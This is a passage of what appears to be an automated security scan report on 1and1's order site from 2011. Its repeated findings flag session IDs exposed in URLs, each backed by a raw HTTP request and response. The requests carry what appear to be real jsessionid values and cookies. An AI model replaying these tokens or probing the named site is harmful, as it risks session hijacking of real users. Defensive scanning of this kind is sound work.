Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrSesub;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrSesub?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrStat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrStat?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsPlesk

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsPlesk?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.33. http://order.1and1.com/xml/order/FeatureParallelsSB

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsSB

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsSB?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSecurityCertificate;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSecurityCertificate?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinux

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinux?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinuxOpt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindows

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindows?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindowsOpt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.39. http://order.1and1.com/xml/order/FeatureServerFirewall

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerFirewall

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerFirewall;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerFirewall?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerHarddrive

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerHarddrive;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:52:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerHarddrive?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoring

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoring?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoringCloud

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoringCloud?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.43. http://order.1and1.com/xml/order/FeatureServerProcessor

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerProcessor

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
